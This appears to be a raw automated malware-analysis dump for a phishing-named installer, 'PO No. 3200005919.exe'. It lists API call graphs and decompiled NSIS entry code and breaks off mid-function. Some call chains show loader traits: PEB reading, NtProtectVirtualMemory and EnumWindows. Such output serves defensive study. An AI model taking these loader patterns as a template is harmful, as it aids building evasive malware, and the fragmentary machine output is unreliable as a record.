405f25 ReadFile 11390->11391 11392 40343e 11391->11392 11392->11272 11393->11263 11395 4067e3 PeekMessageW 11394->11395 11396 4067f3 11395->11396 11397 4067d9 DispatchMessageW 11395->11397 11396->11362 11397->11395 11399 402e65 11398->11399 11400 402e67 MulDiv 11398->11400 11399->11400 11400->11371 11402 4032f0 11401->11402 11403 40341a 11401->11403 11414 403441 SetFilePointer 11402->11414 11404 402e72 32 API calls 11403->11404 11410 4031ec 11404->11410 11406 4032fb SetFilePointer 11412 403320 11406->11412 11407 40342b ReadFile 11407->11412 11409 402e72 32 API calls 11409->11412 11410->11380 11410->11381 11411 405f54 WriteFile 11411->11412 11412->11407 11412->11409 11412->11410 11412->11411 11413 4033fb SetFilePointer 11412->11413 11415 40690b 11412->11415 11413->11403 11414->11406 11416 406930 11415->11416 11417 406938 11415->11417 11416->11412 11417->11416 11418 4069c8 GlobalAlloc 11417->11418 11419 4069bf GlobalFree 11417->11419 11420 406a36 GlobalFree 11417->11420 11421 406a3f GlobalAlloc 11417->11421 11418->11416 11418->11417 11419->11418 11420->11421 11421->11416 11421->11417 11422->11282 11424 403da8 11423->11424 11439 4062f7 wsprintfW 11424->11439 11426 403e19 11440 403e4d 11426->11440 11428 403b49 11428->11288 11429 403e1e 11429->11428 11430 4063d2 17 API calls 11429->11430 11430->11429 11431->11290 11433 404391 SendMessageW 11432->11433 11437 40550a 11433->11437 11434 405531 11435 404391 SendMessageW 11434->11435 11436 405543 OleUninitialize 11435->11436 11436->11320 11437->11434 11438 401389 2 API calls 11437->11438 11438->11437 11439->11426 11441 4063d2 17 API calls 11440->11441 11442 403e5b SetWindowTextW 11441->11442 11442->11429 11444 403a37 11443->11444 11445 403a00 11444->11445 11446 403a3c FreeLibrary GlobalFree 11444->11446 11445->11341 11446->11445 11446->11446 11447 404d90 GetDlgItem GetDlgItem 11448 404de2 7 API calls 11447->11448 11459 404ffb 11447->11459 11449 404e85 DeleteObject 11448->11449 11450 404e78 SendMessageW 11448->11450 11451 404e8e 11449->11451 11450->11449 11453 404e9d 11451->11453 11454 404ec5 11451->11454 11452 4050df 11456 40518b 11452->11456 11461 405373 11452->11461 11468 405138 SendMessageW 11452->11468 11457 4063d2 17 API calls 11453->11457 11503 404345 11454->11503 11462 405195 SendMessageW 11456->11462 11463 40519d 11456->11463 11464 404ea7 SendMessageW SendMessageW 11457->11464 11458 4050c0 11458->11452 11470 4050d1 SendMessageW 11458->11470 11459->11452 11459->11458 11465 40505b 11459->11465 11460 404ed9 11467 404345 18 API calls 11460->11467 11511 4043ac 11461->11511 11462->11463 11471 4051b6 11463->11471 11472 4051af ImageList_Destroy 11463->11472 11479 4051c6 11463->11479 11464->11451 11466 404cde 5 API calls 11465->11466 11482 40506c 11466->11482 11483 404ee7 11467->11483 11468->11461 11474 40514d SendMessageW 11468->11474 11470->11452 11476 4051bf GlobalFree 11471->11476 11471->11479 11472->11471 11473 405335 11473->11461 11480 405347 ShowWindow GetDlgItem ShowWindow 11473->11480 11478 405160 11474->11478 11476->11479 11477 404fbc GetWindowLongW SetWindowLongW 11481 404fd5 11477->11481 11489 405171 SendMessageW 11478->11489 11479->11473 11493 404d5e 4 API calls 11479->11493 11497 405201 11479->11497 11480->11461 11484 404ff3 11481->11484 11485 404fdb ShowWindow 11481->11485 11482->11458 11483->11477 11488 404f37 SendMessageW 11483->11488 11490 404fb6 11483->11490 11491 404f73 SendMessageW 11483->11491 11492 404f84 SendMessageW 11483->11492 11507 40437a SendMessageW 11484->11507 11506 40437a SendMessageW 11485->11506 11488->11483 11489->11456 11490->11477 11490->11481 11491->11483 11492->11483 11493->11497 11494 404fee 11494->11461 11495 40530b InvalidateRect 11495->11473 11496 405321 11495->11496 11508 404c99 11496->11508 11498 40522f SendMessageW 11497->11498 11499 405245 11497->11499 11498->11499 11499->11495 11501 4052a6 11499->11501 11502 4052b9 SendMessageW SendMessageW 11499->11502 11501->11502 11502->11499 11504 4063d2 17 API calls 11503->11504 11505 404350 SetDlgItemTextW 11504->11505 11505->11460 11506->11494 11507->11459 11525 404bd0 11508->11525 11510 404cae 11510->11473 11512 4043c4 GetWindowLongW 11511->11512 11522 40444d 11511->11522 11513 4043d5 11512->11513 11512->11522 11514 4043e4 GetSysColor 11513->11514 11515 4043e7 11513->11515 11514->11515 11516 4043f7 SetBkMode 11515->11516 11517 4043ed SetTextColor 11515->11517 11518 404415 11516->11518 11519 40440f GetSysColor 11516->11519 11517->11516 11520 40441c SetBkColor 11518->11520 11521 404426 11518->11521 11519->11518 11520->11521 11521->11522 11523 404440 CreateBrushIndirect 11521->11523 11524 404439 DeleteObject 11521->11524 11523->11522 11524->11523 11526 404be9 11525->11526 11527 4063d2 17 API calls 11526->11527 11528 404c4d 11527->11528 11529 4063d2 17 API calls 11528->11529 11530 404c58 11529->11530 11531 4063d2 17 API calls 11530->11531 11532 404c6e lstrlenW wsprintfW SetDlgItemTextW 11531->11532 11532->11510 11533 4014d7 11534 402c15 17 API calls 11533->11534 11535 4014dd Sleep 11534->11535 11537 402abf 11535->11537 11538 4122b89 11541 413fab7 11538->11541 11540 4122b8f 11542 413face 11541->11542 11551 4142554 11542->11551 11544 413fb3d 11558 413fd3f 11544->11558 11546 413fcf8 11546->11540 11547 413fb5d 11547->11546 11548 4142554 EnumWindows 11547->11548 11549 413fc7b 11548->11549 11550 413fd3f CreateFileA 11549->11550 11550->11546 11552 4142563 11551->11552 11557 412ced4 11552->11557 11566 4142667 11552->11566 11556 4142725 11556->11544 11557->11544 11559 413fdfd CreateFileA 11558->11559 11559->11547 11561 4141e1e 11563 41232f9 11561->11563 11564 4141e3e 11561->11564 11565 41233ec 11563->11565 11570 41230e9 11563->11570 11564->11556 11565->11556 11567 41426fb 11566->11567 11568 4141e1e EnumWindows 11567->11568 11569 4142704 11568->11569 11569->11557 11569->11561 11571 41230dc 11570->11571 11571->11570 11572 4123159 EnumWindows 11571->11572 11572->11563 11573 40175c 11574 402c37 17 API calls 11573->11574 11575 401763 11574->11575 11576 405ed1 2 API calls 11575->11576 11577 40176a 11576->11577 11578 405ed1 2 API calls 11577->11578 11578->11577 11579 402862 11580 402c37 17 API calls 11579->11580 11581 402869 FindFirstFileW 11580->11581 11582 402891 11581->11582 11586 40287c 11581->11586 11587 4062f7 wsprintfW 11582->11587 11584 40289a 11588 4063b0 lstrcpynW 11584->11588 11587->11584 11588->11586 11589 4015a3 11590 402c37 17 API calls 11589->11590 11591 4015aa SetFileAttributesW 11590->11591 11592 4015bc 11591->11592 11593 412307b 11596 41432eb 11593->11596 11595 4123085 11597 41432fc 11596->11597 11598 4143358 GetPEB 11597->11598 11599 41433c4 11598->11599 11615 41443b0 NtProtectVirtualMemory 11599->11615 11601 4143450 11602 4143d6d 11601->11602 11603 412ced4 11601->11603 11612 414387e 11601->11612 11602->11603 11606 41232f9 11602->11606 11607 414418d 11602->11607 11611 4143eb9 11602->11611 11603->11595 11604 41230e9 EnumWindows 11604->11606 11606->11604 11608 41233ec 11606->11608 11607->11603 11618 41443b0 NtProtectVirtualMemory 11607->11618 11608->11595 11609 41440ed 11617 41443b0 NtProtectVirtualMemory 11609->11617 11611->11603 11611->11606 11611->11609 11612->11603 11616 41443b0 NtProtectVirtualMemory 11612->11616 11614 414418a 11614->11595 11615->11601 11616->11603 11617->11614 11618->11603 11619 4027e9 11620 4027f0 11619->11620 11623 402a6a 11619->11623 11621 402c15 17 API calls 11620->11621 11622 4027f7 11621->11622 11624 402806 SetFilePointer 11622->11624 11624->11623 11625 402816 11624->11625 11627 4062f7 wsprintfW 11625->11627 11627->11623 11628 403e6c 11629 403e84 11628->11629 11630 403fbf 11628->11630 11629->11630 11631 403e90 11629->11631 11632 403fd0 GetDlgItem GetDlgItem 11630->11632 11641 404010 11630->11641 11633 403e9b SetWindowPos 11631->11633 11634 403eae 11631->11634 11635 404345 18 API calls 11632->11635 11633->11634 11638 403eb3 ShowWindow 11634->11638 11639 403ecb 11634->11639 11640 403ffa SetClassLongW 11635->11640 11636 40406a 11637 404391 SendMessageW 11636->11637 11647 403fba 11636->11647 11690 40407c 11637->11690 11638->11639 11643 403ed3 DestroyWindow 11639->11643 11644 403eed 11639->11644 11645 40140b 2 API calls 11640->11645 11641->11636 11642 401389 2 API calls 11641->11642 11646 404042 11642->11646 11648 4042ef 11643->11648 11649 403ef2 SetWindowLongW 11644->11649 11650 403f03 11644->11650 11645->11641 11646->11636 11651 404046 SendMessageW 11646->11651 11648->11647 11659 4042ff ShowWindow 11648->11659 11649->11647 11654 403fac 11650->11654 11655 403f0f GetDlgItem 11650->11655 11651->11647 11652 40140b 2 API calls 11652->11690 11653 4042d0 DestroyWindow EndDialog 11653->11648 11658 4043ac 8 API calls 11654->11658 11656 403f22 SendMessageW IsWindowEnabled 11655->11656 11657 403f3f 11655->11657 11656->11647 11656->11657 11661 403f4c 11657->11661 11662 403f93 SendMessageW 11657->11662 11663 403f5f 11657->11663 11672 403f44 11657->11672 11658->11647 11659->11647 11660 4063d2 17 API calls 11660->11690 11661->11662 11661->11672 11662->11654 11665 403f67 11663->11665 11666 403f7c 11663->11666 11670 40140b 2 API calls 11665->11670 11668 40140b 2 API calls 11666->11668 11667 403f7a 11667->11654 11671 403f83 11668->11671 11669 404345 18 API calls 11669->11690 11670->11672 11671->11654 11671->11672 11703 40431e 11672->11703 11673 404345 18 API calls 11674 4040f7 GetDlgItem 11673->11674 11675 404114 ShowWindow KiUserCallbackDispatcher 11674->11675 11676 40410c 11674->11676 11700 404367 EnableWindow 11675->11700 11676->11675 11678 40413e EnableWindow 11683 404152 11678->11683 11679 404157 GetSystemMenu EnableMenuItem SendMessageW 11680 404187 SendMessageW 11679->11680 11679->11683 11680->11683 11682 403e4d 18 API calls 11682->11683 11683->11679 11683->11682 11701 40437a SendMessageW 11683->11701 11702 4063b0 lstrcpynW 11683->11702 11685 4041b6 lstrlenW 11686 4063d2 17 API calls 11685->11686 11687 4041cc SetWindowTextW 11686->11687 11688 401389 2 API calls 11687->11688 11688->11690 11689 404210 DestroyWindow 11689->11648 11691 40422a CreateDialogParamW 11689->11691 11690->11647 11690->11652 11690->11653 11690->11660 11690->11669 11690->11673 11690->11689 11691->11648 11692 40425d 11691->11692 11693 404345 18 API calls 11692->11693 11694 404268 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 11693->11694 11695 401389 2 API calls 11694->11695 11696 4042ae 11695->11696 11696->11647 11697 4042b6 ShowWindow 11696->11697 11698 404391 SendMessageW 11697->11698 11699 4042ce 11698->11699 11699->11648 11700->11678 11701->11683 11702->11685 11704 404325 11703->11704 11705 40432b SendMessageW 11703->11705 11704->11705 11705->11667 11706 40202c 11707 40203e 11706->11707 11717 4020f0 11706->11717 11708 402c37 17 API calls 11707->11708 11710 402045 11708->11710 11709 401423 24 API calls 11712 40224a 11709->11712 11711 402c37 17 API calls 11710->11711 11713 40204e 11711->11713 11714 402064 LoadLibraryExW 11713->11714 11715 402056 GetModuleHandleW 11713->11715 11716 402075 11714->11716 11714->11717 11715->11714 11715->11716 11729 4067f9 WideCharToMultiByte 11716->11729 11717->11709 11720 402086 11722 4020a5 11720->11722 11723 40208e 11720->11723 11721 4020bf 11724 405414 24 API calls 11721->11724 11732 10001759 11722->11732 11725 401423 24 API calls 11723->11725 11726 402096 11724->11726 11725->11726 11726->11712 11727 4020e2 FreeLibrary 11726->11727 11727->11712 11730 406823 GetProcAddress 11729->11730 11731 402080 11729->11731 11730->11731 11731->11720 11731->11721 11733 10001789 11732->11733 11774 10001b18 11733->11774 11735 10001790 11736 100018a6 11735->11736 11737 100017a1 11735->11737 11738 100017a8 11735->11738 11736->11726 11814 10002286 11737->11814 11798 100022d0 11738->11798 11743 1000180c 11747 10001812 11743->11747 11748 1000184e 11743->11748 11744 100017ee 11827 100024a4 11744->11827 11745 100017d7 11758 100017cd 11745->11758 11824 10002b57 11745->11824 11746 100017be 11750 100017c4 11746->11750 11751 100017cf 11746->11751 11753 100015b4 3 API calls 11747->11753 11755 100024a4 10 API calls 11748->11755 11750->11758 11808 1000289c 11750->11808 11818 10002640 11751->11818 11760 10001828 11753->11760 11766 10001840 11755->11766 11756 100017f4 11838 100015b4 11756->11838 11758->11743 11758->11744 11763 100024a4 10 API calls 11760->11763 11762 100017d5 11762->11758 11763->11766 11765 10001895 11765->11736 11768 1000189f GlobalFree 11765->11768 11766->11765 11849 10002467 11766->11849 11768->11736 11771 10001881 11771->11765 11853 1000153d wsprintfW 11771->11853 11772 1000187a FreeLibrary 11772->11771 11856 1000121b GlobalAlloc 11774->11856 11776 10001b3c 11857 1000121b GlobalAlloc 11776->11857 11778 10001d7a GlobalFree GlobalFree GlobalFree 11780 10001de1 11778->11780 11781 10001d97 11778->11781 11779 10001b47 11779->11778 11779->11780 11784 10001c1d GlobalAlloc 11779->11784 11787 10001c86 GlobalFree 11779->11787 11788 10001c68 lstrcpyW 11779->11788 11789 10001c72 lstrcpyW 11779->11789 11791 10002048 11779->11791 11794 10001f37 GlobalFree 11779->11794 11795 10001cc4 11779->11795 11797 1000122c 2 API calls 11779->11797 11863 1000121b GlobalAlloc 11779->11863 11780->11735 11781->11780 11782 10001dac 11781->11782 11783 100020ee 11781->11783 11782->11780 11860 1000122c 11782->11860 11785 10002110 GetModuleHandleW 11783->11785 11786 100020f6 11783->11786 11784->11779 11785->11780 11787->11779 11788->11789 11789->11779 11791->11780 11793 10002090 lstrcpyW 11791->11793 11793->11780 11794->11779 11795->11779 11858 1000158f GlobalSize GlobalAlloc 11795->11858 11797->11779 11804 100022e8 11798->11804 11800 10002410 GlobalFree 11803 100017ae 11800->11803 11800->11804 11801 100023ba GlobalAlloc CLSIDFromString 11801->11800 11802 1000238f GlobalAlloc WideCharToMultiByte 11802->11800 11803->11745 11803->11746 11803->11758 11804->11800 11804->11801 11804->11802 11805 1000122c GlobalAlloc lstrcpynW 11804->11805 11807 100023d9 11804->11807 11865 100012ba 11804->11865 11805->11804 11807->11800 11869 100025d4 11807->11869 11810 100028ae 11808->11810 11809 10002953 CreateFileA 11811 10002971 11809->11811 11810->11809 11812 10002a62 GetLastError 11811->11812 11813 10002a6d 11811->11813 11812->11813 11813->11758 11815 10002296 11814->11815 11816 100017a7 11814->11816 11815->11816 11817 100022a8 GlobalAlloc 11815->11817 11816->11738 11817->11815 11822 1000265c 11818->11822 11819 100026c0 11821 100026c5 GlobalSize 11819->11821 11823 100026cf 11819->11823 11820 100026ad GlobalAlloc 11820->11823 11821->11823 11822->11819 11822->11820 11823->11762 11825 10002b62 11824->11825 11826 10002ba2 GlobalFree 11825->11826 11872 1000121b GlobalAlloc 11827->11872 11829 10002506 MultiByteToWideChar 11835 100024ae 11829->11835 11830 1000252b StringFromGUID2 11830->11835 11831 1000253c lstrcpynW 11831->11835 11832 1000254f wsprintfW 11832->11835 11833 1000256c GlobalFree 11833->11835 11834 100025a7 GlobalFree 11834->11756 11835->11829 11835->11830 11835->11831 11835->11832 11835->11833 11835->11834 11836 10001272 2 API calls 11835->11836 11873 100012e1 11835->11873 11836->11835 11877 1000121b GlobalAlloc 11838->11877 11840 100015ba 11841 100015c7 lstrcpyW 11840->11841 11843 100015e1 11840->11843 11844 100015fb 11841->11844 11843->11844 11845 100015e6 wsprintfW 11843->11845 11846 10001272 11844->11846 11845->11844 11847 100012b5 GlobalFree 11846->11847 11848 1000127b GlobalAlloc lstrcpynW 11846->11848 11847->11766 11848->11847 11850 10002475 11849->11850 11852 10001861 11849->11852 11851 10002491 GlobalFree 11850->11851 11850->11852 11851->11850 11852->11771 11852->11772 11854 10001272 2 API calls 11853->11854 11855 1000155e 11854->11855 11855->11765 11856->11776 11857->11779 11859 100015ad 11858->11859 11859->11795 11864 1000121b GlobalAlloc 11860->11864 11862 1000123b lstrcpynW 11862->11780 11863->11779 11864->11862 11866 100012c1 11865->11866 11867 1000122c 2 API calls 11866->11867 11868 100012df 11867->11868 11868->11804 11870 100025e2 VirtualAlloc 11869->11870 11871 10002638 11869->11871 11870->11871 11871->11807 11872->11835 11874 100012ea 11873->11874 11875 1000130c 11873->11875 11874->11875 11876 100012f0 lstrcpyW 11874->11876 11875->11835 11876->11875 11877->11840 11878 40176f 11879 402c37 17 API calls 11878->11879 11880 401776 11879->11880 11881 401796 11880->11881 11882 40179e 11880->11882 11917 4063b0 lstrcpynW 11881->11917 11918 4063b0 lstrcpynW 11882->11918 11885 40179c 11889 406644 5 API calls 11885->11889 11886 4017a9 11887 405c81 3 API calls 11886->11887 11888 4017af lstrcatW 11887->11888 11888->11885 11905 4017bb 11889->11905 11890 4066f3 2 API calls 11890->11905 11891 405e7d 2 API calls 11891->11905 11893 4017cd CompareFileTime 11893->11905 11894 40188d 11896 405414 24 API calls 11894->11896 11895 401864 11897 405414 24 API calls 11895->11897 11915 401879 11895->11915 11898 401897 11896->11898 11897->11915 11899 4031ba 44 API calls 11898->11899 11900 4018aa 11899->11900 11901 4018be SetFileTime 11900->11901 11902 4018d0 CloseHandle 11900->11902 11901->11902 11904 4018e1 11902->11904 11902->11915 11903 4063d2 17 API calls 11903->11905 11906 4018e6 11904->11906 11907 4018f9 11904->11907 11905->11890 11905->11891 11905->11893 11905->11894 11905->11895 11905->11903 11908 4063b0 lstrcpynW 11905->11908 11911 405a12 MessageBoxIndirectW 11905->11911 11916 405ea2 GetFileAttributesW CreateFileW 11905->11916 11909 4063d2 17 API calls 11906->11909 11910 4063d2 17 API calls 11907->11910 11908->11905 11912 4018ee lstrcatW 11909->11912 11913 401901 11910->11913 11911->11905 11912->11913 11914 405a12 MessageBoxIndirectW 11913->11914 11914->11915 11916->11905 11917->11885 11918->11886 11919 4024f2 11920 402c77 17 API calls 11919->11920 11921 4024fc 11920->11921 11922 402c15 17 API calls 11921->11922 11923 402505 11922->11923 11924 402514 11923->11924 11929 402885 11923->11929 11925 402521 RegEnumKeyW 11924->11925 11926 40252d RegEnumValueW 11924->11926 11928 402549 RegCloseKey 11925->11928 11927 402542 11926->11927 11926->11928 11927->11928 11928->11929 11931 401db3 GetDC 11932 402c15 17 API calls 11931->11932 11933 401dc5 GetDeviceCaps MulDiv ReleaseDC 11932->11933 11934 402c15 17 API calls 11933->11934 11935 401df6 11934->11935 11936 4063d2 17 API calls 11935->11936 11937 401e33 CreateFontIndirectW 11936->11937 11938 40258c 11937->11938 11939 40167b 11940 402c37 17 API calls 11939->11940 11941 401682 11940->11941 11942 402c37 17 API calls 11941->11942 11943 40168b 11942->11943 11944 402c37 17 API calls 11943->11944 11945 401694 MoveFileW 11944->11945 11946 4016a0 11945->11946 11947 4016a7 11945->11947 11948 401423 24 API calls 11946->11948 11949 4066f3 2 API calls 11947->11949 11951 40224a 11947->11951 11948->11951 11950 4016b6 11949->11950 11950->11951 11952 406176 36 API calls 11950->11952 11952->11946 11953 40247e 11954 402c77 17 API calls 11953->11954 11955 402488 11954->11955 11956 402c37 17 API calls 11955->11956 11957 402491 11956->11957 11958 402885 11957->11958 11959 40249c RegQueryValueExW 11957->11959 11960 4024bc 11959->11960 11963 4024c2 RegCloseKey 11959->11963 11960->11963 11964 4062f7 wsprintfW 11960->11964 11963->11958 11964->11963 11965 4020fe 11966 402c37 17 API calls 11965->11966 11967 402105 11966->11967 11968 402c37 17 API calls 11967->11968 11969 40210f 11968->11969 11970 402c37 17 API calls 11969->11970 11971 402119 11970->11971 11972 402c37 17 API calls 11971->11972 11973 402123 11972->11973 11974 402c37 17 API calls 11973->11974 11975 40212d 11974->11975 11976 40216c CoCreateInstance 11975->11976 11977 402c37 17 API calls 11975->11977 11980 40218b 11976->11980 11977->11976 11978 401423 24 API calls 11979 40224a 11978->11979 11980->11978 11980->11979

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 0 403489-4034c6 SetErrorMode GetVersion 1 4034c8-4034d0 call 40678a 0->1 2 4034d9 0->2 1->2 7 4034d2 1->7 4 4034de-4034f2 call 40671a lstrlenA 2->4 9 4034f4-403510 call 40678a * 3 4->9 7->2 16 403521-403582 #17 OleInitialize SHGetFileInfoW call 4063b0 GetCommandLineW call 4063b0 GetModuleHandleW 9->16 17 403512-403518 9->17 24 403584-40358b 16->24 25 40358c-4035a6 call 405cae CharNextW 16->25 17->16 21 40351a 17->21 21->16 24->25 28 4035ac-4035b2 25->28 29 4036bd-4036d7 GetTempPathW call 403458 25->29 31 4035b4-4035b9 28->31 32 4035bb-4035bf 28->32 38 4036d9-4036f7 GetWindowsDirectoryW lstrcatW call 403458 29->38 39 40372f-403749 DeleteFileW call 402f14 29->39 31->31 31->32 34 4035c1-4035c5 32->34 35 4035c6-4035ca 32->35 34->35 36 4035d0-4035d6 35->36 37 403689-403696 call 405cae 35->37 40 4035f1-40362a 36->40 41 4035d8-4035e0 36->41 57 403698-403699 37->57 58 40369a-4036a0 37->58 38->39 56 4036f9-403729 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403458 38->56 52 4037fa-40380a call 4039cc OleUninitialize 39->52 53 40374f-403755 39->53 48 403647-403681 40->48 49 40362c-403631 40->49 46 4035e2-4035e5 41->46 47 4035e7 41->47 46->40 46->47 47->40 48->37 55 403683-403687 48->55 49->48 54 403633-40363b 49->54 75 403930-403936 52->75 76 403810-403820 call 405a12 ExitProcess 52->76 60 4037ea-4037f1 call 403abe 53->60 61 40375b-403766 call 405cae 53->61 63 403642 54->63 64 40363d-403640 54->64 55->37 65 4036a8-4036b6 call 4063b0 55->65 56->39 56->52 57->58 58->28 59 4036a6 58->59 67 4036bb 59->67 74 4037f6 60->74 77 4037b4-4037be 61->77 78 403768-40379d 61->78 63->48 64->48 64->63 65->67 67->29 74->52 80 4039b4-4039bc 75->80 81 403938-40394e GetCurrentProcess OpenProcessToken 75->81 85 4037c0-4037ce call 405d89 77->85 86 403826-40383a call 40597d lstrcatW 77->86 82 40379f-4037a3 78->82 83 4039c2-4039c6 ExitProcess 80->83 84 4039be 80->84 88 403950-40397e LookupPrivilegeValueW AdjustTokenPrivileges 81->88 89 403984-403992 call 40678a 81->89 91 4037a5-4037aa 82->91 92 4037ac-4037b0 82->92 84->83 85->52 101 4037d0-4037e6 call 4063b0 * 2 85->101 102 403847-403861 lstrcatW lstrcmpiW 86->102 103 40383c-403842 lstrcatW 86->103 88->89 99 4039a0-4039ab ExitWindowsEx 89->99 100 403994-40399e 89->100 91->92 96 4037b2 91->96 92->82 92->96 96->77 99->80 105 4039ad-4039af call 40140b 99->105 100->99 100->105 101->60 102->52 104 403863-403866 102->104 103->102 108 403868-40386d call 4058e3 104->108 109 40386f call 405960 104->109 105->80 117 403874-403882 SetCurrentDirectoryW 108->117 109->117 118 403884-40388a call 4063b0 117->118 119 40388f-4038b8 call 4063b0 117->119 118->119 123 4038bd-4038d9 call 4063d2 DeleteFileW 119->123 126 40391a-403922 123->126 127 4038db-4038eb CopyFileW 123->127 126->123 129 403924-40392b call 406176 126->129 127->126 128 4038ed-40390d call 406176 call 4063d2 call 405995 127->128 128->126 138 40390f-403916 CloseHandle 128->138 129->52 138->126
                                                                      C-Code - Quality: 81%
                                                                      			_entry_() {
                                                                      				signed int _t51;
                                                                      				intOrPtr* _t56;
                                                                      				WCHAR* _t60;
                                                                      				char* _t63;
                                                                      				void* _t66;
                                                                      				void* _t68;
                                                                      				int _t70;
                                                                      				int _t72;
                                                                      				int _t75;
                                                                      				intOrPtr* _t76;
                                                                      				int _t77;
                                                                      				int _t79;
                                                                      				void* _t103;
                                                                      				signed int _t120;
                                                                      				void* _t123;
                                                                      				void* _t128;
                                                                      				intOrPtr _t147;
                                                                      				intOrPtr _t148;
                                                                      				intOrPtr* _t149;
                                                                      				int _t151;
                                                                      				void* _t154;
                                                                      				int _t155;
                                                                      				signed int _t159;
                                                                      				signed int _t164;
                                                                      				signed int _t169;
                                                                      				void* _t171;
                                                                      				WCHAR* _t172;
                                                                      				signed int _t175;
                                                                      				signed int _t178;
                                                                      				CHAR* _t179;
                                                                      				void* _t182;
                                                                      				int* _t184;
                                                                      				void* _t192;
                                                                      				char* _t193;
                                                                      				void* _t196;
                                                                      				void* _t197;
                                                                      				void* _t243;
                                                                      
                                                                      				_t171 = 0x20;
                                                                      				_t151 = 0;
                                                                      				 *(_t197 + 0x14) = 0;
                                                                      				 *(_t197 + 0x10) = L"Error writing temporary file. Make sure your temp folder is valid.";
                                                                      				 *(_t197 + 0x1c) = 0;
                                                                      				SetErrorMode(0x8001); // executed
                                                                      				_t51 = GetVersion() & 0xbfffffff;
                                                                      				 *0x42a24c = _t51;
                                                                      				if(_t51 != 6) {
                                                                      					_t149 = E0040678A(0);
                                                                      					if(_t149 != 0) {
                                                                      						 *_t149(0xc00);
                                                                      					}
                                                                      				}
                                                                      				_t179 = "UXTHEME";
                                                                      				goto L4;
                                                                      				L8:
                                                                      				__imp__#17(_t192);
                                                                      				__imp__OleInitialize(_t151); // executed
                                                                      				 *0x42a318 = _t56;
                                                                      				SHGetFileInfoW(0x4216e8, _t151, _t197 + 0x34, 0x2b4, _t151); // executed
                                                                      				E004063B0(0x429240, L"NSIS Error");
                                                                      				_t60 = GetCommandLineW();
                                                                      				_t193 = L"\"C:\\Users\\Arthur\\Desktop\\PO No. 3200005919.exe\"";
                                                                      				E004063B0(_t193, _t60);
                                                                      				 *0x42a240 = GetModuleHandleW(_t151);
                                                                      				_t63 = _t193;
                                                                      				if(L"\"C:\\Users\\Arthur\\Desktop\\PO No. 3200005919.exe\"" == 0x22) {
                                                                      					_t63 =  &M00435002;
                                                                      					_t171 = 0x22;
                                                                      				}
                                                                      				_t155 = CharNextW(E00405CAE(_t63, _t171));
                                                                      				 *(_t197 + 0x18) = _t155;
                                                                      				_t66 =  *_t155;
                                                                      				if(_t66 == _t151) {
                                                                      					L33:
                                                                      					_t172 = L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\";
                                                                      					GetTempPathW(0x400, _t172);
                                                                      					_t68 = E00403458(_t155, 0);
                                                                      					_t225 = _t68;
                                                                      					if(_t68 != 0) {
                                                                      						L36:
                                                                      						DeleteFileW(L"1033"); // executed
                                                                      						_t70 = E00402F14(_t227,  *(_t197 + 0x1c)); // executed
                                                                      						 *(_t197 + 0x10) = _t70;
                                                                      						if(_t70 != _t151) {
                                                                      							L48:
                                                                      							E004039CC();
                                                                      							__imp__OleUninitialize();
                                                                      							_t239 =  *(_t197 + 0x10) - _t151;
                                                                      							if( *(_t197 + 0x10) == _t151) {
                                                                      								__eflags =  *0x42a2f4 - _t151;
                                                                      								if( *0x42a2f4 == _t151) {
                                                                      									L72:
                                                                      									_t72 =  *0x42a30c;
                                                                      									__eflags = _t72 - 0xffffffff;
                                                                      									if(_t72 != 0xffffffff) {
                                                                      										 *(_t197 + 0x10) = _t72;
                                                                      									}
                                                                      									ExitProcess( *(_t197 + 0x10));
                                                                      								}
                                                                      								_t75 = OpenProcessToken(GetCurrentProcess(), 0x28, _t197 + 0x14);
                                                                      								__eflags = _t75;
                                                                      								if(_t75 != 0) {
                                                                      									LookupPrivilegeValueW(_t151, L"SeShutdownPrivilege", _t197 + 0x20);
                                                                      									 *(_t197 + 0x34) = 1;
                                                                      									 *(_t197 + 0x40) = 2;
                                                                      									AdjustTokenPrivileges( *(_t197 + 0x28), _t151, _t197 + 0x24, _t151, _t151, _t151);
                                                                      								}
                                                                      								_t76 = E0040678A(4);
                                                                      								__eflags = _t76 - _t151;
                                                                      								if(_t76 == _t151) {
                                                                      									L70:
                                                                      									_t77 = ExitWindowsEx(2, 0x80040002);
                                                                      									__eflags = _t77;
                                                                      									if(_t77 != 0) {
                                                                      										goto L72;
                                                                      									}
                                                                      									goto L71;
                                                                      								} else {
                                                                      									_t79 =  *_t76(_t151, _t151, _t151, 0x25, 0x80040002);
                                                                      									__eflags = _t79;
                                                                      									if(_t79 == 0) {
                                                                      										L71:
                                                                      										E0040140B(9);
                                                                      										goto L72;
                                                                      									}
                                                                      									goto L70;
                                                                      								}
                                                                      							}
                                                                      							E00405A12( *(_t197 + 0x10), 0x200010);
                                                                      							ExitProcess(2);
                                                                      						}
                                                                      						if( *0x42a260 == _t151) {
                                                                      							L47:
                                                                      							 *0x42a30c =  *0x42a30c | 0xffffffff;
                                                                      							 *(_t197 + 0x14) = E00403ABE( *0x42a30c);
                                                                      							goto L48;
                                                                      						}
                                                                      						_t184 = E00405CAE(_t193, _t151);
                                                                      						if(_t184 < _t193) {
                                                                      							L44:
                                                                      							_t236 = _t184 - _t193;
                                                                      							 *(_t197 + 0x10) = L"Error launching installer";
                                                                      							if(_t184 < _t193) {
                                                                      								_t182 = E0040597D(_t239);
                                                                      								lstrcatW(_t172, L"~nsu");
                                                                      								if(_t182 != _t151) {
                                                                      									lstrcatW(_t172, "A");
                                                                      								}
                                                                      								lstrcatW(_t172, L".tmp");
                                                                      								_t195 = L"C:\\Users\\Arthur\\Desktop";
                                                                      								if(lstrcmpiW(_t172, L"C:\\Users\\Arthur\\Desktop") != 0) {
                                                                      									_push(_t172);
                                                                      									if(_t182 == _t151) {
                                                                      										E00405960();
                                                                      									} else {
                                                                      										E004058E3();
                                                                      									}
                                                                      									SetCurrentDirectoryW(_t172);
                                                                      									_t243 = L"C:\\Users\\Arthur\\Overfurnished\\Tuberculisation\\Woodwose" - _t151; // 0x43
                                                                      									if(_t243 == 0) {
                                                                      										E004063B0(L"C:\\Users\\Arthur\\Overfurnished\\Tuberculisation\\Woodwose", _t195);
                                                                      									}
                                                                      									E004063B0(0x42b000,  *(_t197 + 0x18));
                                                                      									_t156 = "A" & 0x0000ffff;
                                                                      									 *0x42b800 = ( *0x40a316 & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
                                                                      									_t196 = 0x1a;
                                                                      									do {
